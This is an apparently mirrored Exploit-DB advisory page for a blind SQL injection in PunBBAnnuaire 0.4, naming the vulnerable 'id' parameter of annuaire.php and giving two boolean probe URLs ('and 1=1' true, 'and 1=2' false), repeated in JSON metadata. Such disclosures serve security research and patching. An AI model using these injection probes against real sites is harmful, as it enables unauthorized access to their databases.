Search...

PunBBAnnuaire <= 0.4 - Blind SQL Injection Vulnerability

2010-02-17T00:00:00

ID EDB-ID:11490
Type exploitdb
Reporter Metropolis
Modified 2010-02-17T00:00:00

Description

PunBBAnnuaire. Webapps exploit for php platform

                                        
                                            PunBBAnnuaire &lt;=0.4 Blind SQL Injection Vulnerability
========================================================

####################################################################
.:. Author : Metropolis
.:. Home : http://xrayoptics.by.ru/
.:. Script : PunBBAnnuaire
.:. Version : 0.4
.:. Download Script: http://www.punres.org/download.php?id=1737
.:. Bug Type : Blind Sql Injection

####################################################################

===[ Exploit ]===

/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]


www.site.com/forum/annuaire.php?action=site&id=1 and 1=1 &lt;-- true

www.site.com/forum/annuaire.php?action=site&id=1 and 1=2 &lt;-- false



####################################################################

Vive la France !

JSON Vulners Source

Initial Source

{"id": "EDB-ID:11490", "hash": "39d2e471df70d03ceb2933682c09351c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PunBBAnnuaire <= 0.4 - Blind SQL Injection Vulnerability", "description": "PunBBAnnuaire. Webapps exploit for php platform", "published": "2010-02-17T00:00:00", "modified": "2010-02-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/11490/", "reporter": "Metropolis", "references": [], "cvelist": [], "lastseen": "2016-02-01T14:25:42", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-02-01T14:25:42"}, "vulnersScore": 10.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/11490/", "sourceData": "PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability\r\n========================================================\r\n\r\n####################################################################\r\n.:. Author : Metropolis\r\n.:. Home : http://xrayoptics.by.ru/\r\n.:. Script : PunBBAnnuaire\r\n.:. Version : 0.4\r\n.:. Download Script: http://www.punres.org/download.php?id=1737\r\n.:. Bug Type : Blind Sql Injection\r\n\r\n####################################################################\r\n\r\n===[ Exploit ]===\r\n\r\n/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]\r\n\r\n\r\nwww.site.com/forum/annuaire.php?action=site&id=1 and 1=1 <-- true\r\n\r\nwww.site.com/forum/annuaire.php?action=site&id=1 and 1=2 <-- false\r\n\r\n\r\n\r\n####################################################################\r\n\r\nVive la France !", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

PunBBAnnuaire &lt;= 0.4 - Blind SQL Injection Vulnerability

Description

PunBBAnnuaire. Webapps exploit for php platform

PunBBAnnuaire <= 0.4 - Blind SQL Injection Vulnerability